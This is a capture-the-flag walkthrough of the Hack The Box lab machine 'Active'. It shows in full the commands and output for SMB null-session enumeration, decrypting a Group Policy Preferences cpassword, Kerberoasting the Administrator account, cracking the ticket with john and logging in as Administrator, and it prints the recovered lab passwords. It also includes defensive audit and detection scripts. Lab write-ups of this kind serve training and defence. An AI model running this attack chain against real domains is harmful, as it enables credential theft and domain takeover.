Active

Easy Windows Active Directory HTB box

Reconnaissance

As always we start off by performing a port scan with the tool Nmap

nmap -p- --open -Pn -n --min-rate 5000 -sS -sCV 10.10.10.100 -oN scan
# Nmap 7.95 scan initiated Wed Jul 30 13:54:34 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.044s latency).
Not shown: 64888 closed tcp ports (reset), 625 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-30 12:54:51Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49163/tcp open  msrpc         Microsoft Windows RPC
49174/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
|   date: 2025-07-30T12:55:48
|_  start_date: 2025-07-30T12:51:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 30 13:55:57 2025 -- 1 IP address (1 host up) scanned in 83.42 seconds

We see that the scan points to the domain active.htb, so we add it to our /etc/hosts file.

The SMB service running on port 445 hints that we're facing a DC (Domain Controller), so let's enumerate it using smbmap:

smbmap -H 10.10.10.100

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.10.100:445	Name: 10.10.10.100        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections    

We can see that we have READ access to the Replication share without credentials, so let's look inside it using smbclient with a null session:

smbclient -N //10.10.10.100/Replication

After browsing the share for a bit, under the directory \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ we find the file Groups.xml:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
 name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
  uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
   changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Hash Cracking

We found a username, SVC_TGS, together with an encrypted password in the cpassword attribute. The AES key used for this value was published by Microsoft, so gpp-decrypt can recover the cleartext directly:

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18

And we got the password! --> GPPstillStandingStrong2k18
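As an added example (not part of the original write-up), a small Python audit script that finds cpassword attributes in Preferences XML such as the Groups.xml above, restores the base64 padding GPP strips, and reports the account, the timestamp and the ciphertext size; the decryption itself with the Microsoft-published AES key is what gpp-decrypt does and is not repeated here. SAMPLE_GROUPS_XML is a constructed copy of the file found above, and find_gpp_credentials, cpassword_to_ciphertext and scan_sysvol are names chosen for this example.

```python
"""Audit Group Policy Preferences XML for stored cpassword attributes (the MS14-025 issue)."""
import base64
import os
import xml.etree.ElementTree as ET

# Constructed copy of the Groups.xml pulled from the Replication share above.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
 name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
  uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
   changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""


def cpassword_to_ciphertext(cpassword: str) -> bytes:
    """GPP stores the base64 value without '=' padding; restore it before decoding."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def find_gpp_credentials(xml_data) -> list:
    """Return one finding per element that carries a non-empty cpassword attribute."""
    root = ET.fromstring(xml_data.encode("utf-8") if isinstance(xml_data, str) else xml_data)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue
        owner = parents.get(elem, root)  # the <User>/<Group> element holds name and changed
        ciphertext = cpassword_to_ciphertext(cpassword)
        findings.append({
            "account": elem.get("userName") or owner.get("name"),
            "changed": owner.get("changed"),
            "ciphertext_len": len(ciphertext),
            "aes_block_aligned": len(ciphertext) % 16 == 0,  # AES-256-CBC input, as gpp-decrypt expects
        })
    return findings


def scan_sysvol(root_dir: str) -> list:
    """Walk a local SYSVOL/Replication copy and audit every XML file under it."""
    results = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(".xml"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    results += [dict(f, file=path) for f in find_gpp_credentials(fh.read())]
    return results
```

Run scan_sysvol against a mounted or mirrored SYSVOL to list every policy that still carries a cpassword; any hit is a credential readable by every domain user.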

Let's try and enumerate the SMB Shares that this user has access to using SMBMap

smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.10.100:445	Name: 10.10.10.100        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
[*] Closed 1 connections     
  

We now have access to three more shares (NETLOGON, SYSVOL and Users), so let's start by enumerating the Users share, where we find user.txt.

After this we enumerate the domain users over RPC using rpcclient:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
rpcclient $>

Kerberoasting

We see the Administrator account; if it has an SPN (Service Principal Name) tied to it, we might be able to Kerberoast it.

Kerberoasting is a technique where we request a Kerberos service ticket (TGS) for an account with an SPN. The ticket comes back encrypted with a key derived from that account's password (its NTLM hash when RC4, etype 23, is used), so we can crack it offline.
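From the defender's side the same request leaves a trace: the DC logs event 4769 with TicketEncryptionType 0x17 (RC4-HMAC) for the SPN's account. The Python below is an added example, not part of the original write-up; the SAMPLE_4769 records are constructed, and detect_kerberoast and is_roastable_service are names chosen here.

```python
"""Flag Kerberoast-style TGS requests in Windows Security event 4769 records."""
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23, the one GetUserSPNs asks for

# Constructed 4769 records (not real logs); the first mirrors the request made above.
SAMPLE_4769 = [
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x7"},
]


def is_roastable_service(service_name: str) -> bool:
    """True for a user service account: not a computer account ('$') and not krbtgt."""
    name = service_name.split("/")[0].split("@")[0]
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoast(events):
    """Return (findings, distinct roastable services per requester) for the given 4769s."""
    findings = []
    per_requester = defaultdict(set)
    for ev in events:
        if ev.get("Status") != "0x0":  # a failed request returns no ticket to crack
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if not is_roastable_service(ev["ServiceName"]):
            continue
        findings.append({"requester": ev["TargetUserName"], "source": ev["IpAddress"],
                         "service": ev["ServiceName"]})
        per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return findings, {who: len(svcs) for who, svcs in per_requester.items()}
```

On a 2008 R2 domain like this one RC4 is still common for ordinary requests, so the per-requester count of distinct roastable services is a stronger signal than any single hit.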

Let's try and perform this attack using impacket-GetUserSPNs

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2025-07-30 13:53:33.360639             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cb55d65694803a7c18c5d2a016407522$[SNIP]

We successfully dumped the hash! Let's try and crack it using john:

john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:03 DONE (2025-07-30 15:54) 0.3225g/s 3400Kp/s 3400Kc/s 3400KC/s Tiffani143..Tekabunare
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We successfully cracked the Administrator's password — Ticketmaster1968

Let's log in via SMB as Administrator to grab the root.txt flag:

smbclient -U Administrator //10.10.10.100/Users

------- SNIP --------

smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 16:49:47 2021
  ..                                 DR        0  Thu Jan 21 16:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 14:50:10 2018
  root.txt                           AR       34  Wed Jul 30 13:53:29 2025

		5217023 blocks of size 4096. 279034 blocks available
smb: \Administrator\Desktop\> get root.txt

Hope you liked this Write-Up and see you next time!!